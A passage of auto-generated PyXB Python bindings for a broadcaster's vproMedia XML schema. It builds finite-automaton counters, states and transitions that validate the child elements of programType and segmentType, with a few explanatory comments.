fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_31, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_32, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_32, False) ]))
st_34._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_33, True) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_33, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_33, False) ]))
st_35._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_34, True) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_34, False) ]))
st_36._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_35, True) ]))
st_37._set_transitionSet(transitions)
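    # All transition sets are wired; assemble the automaton for programType.
    # The third positional argument (False) marks it as non-nullable: an
    # empty child sequence is not accepted.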
return fac.Automaton(states, counters, False, containing_state=None)
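# Attach the finished content-model automaton to programType; PyXB walks this
# automaton when validating the order and multiplicity of a program's child
# elements.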
programType._Automaton = _BuildAutomaton_28()
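# Minimal usage sketch (the module name `vproMedia` below is illustrative,
# not defined by this file; PyXB-generated binding modules normally expose a
# CreateFromDocument helper near the top of the module):
#
#     import vproMedia
#     seg = vproMedia.CreateFromDocument(xml_text)
#
# Parsing a document whose children violate these automata typically raises
# pyxb.UnrecognizedContentError or a related validation exception.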
segmentType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=segmentType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10)))
segmentType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'start'), pyxb.binding.datatypes.duration, scope=segmentType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10)))
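# _BuildAutomaton_29 constructs the finite automaton with counters (FAC) for
# segmentType's content model, straight from the particle bounds declared in
# vproMedia.xsd: one CounterCondition per occurrence constraint, one State per
# element use, and a transition for every legal "next element" step.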
def _BuildAutomaton_29 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_29
del _BuildAutomaton_29
import pyxb.utils.fac as fac
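    # Counter conditions mirror the schema's minOccurs/maxOccurs bounds:
    # max=None means the element may repeat without limit, max=1 means it is
    # an optional singleton.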
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10))
counters.add(cc_33)
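    # One state per element use in segmentType's content model, in schema
    # order ('crid' through 'start').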
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = None
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10))
st_35 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
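    # 'start' is the only state where the automaton may terminate: its
    # final_update is a set (here empty) rather than None.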
final_update = set()
symbol = pyxb.binding.content.ElementUse(segmentType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'start')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10))
st_36 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
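    # Transitions: a self-loop applies UpdateInstruction(cc, True) to count
    # one more occurrence of the same element; advancing to a later element
    # applies UpdateInstruction(cc, False), which closes out that counter
    # (permitted only once its minimum bound has been met).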
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
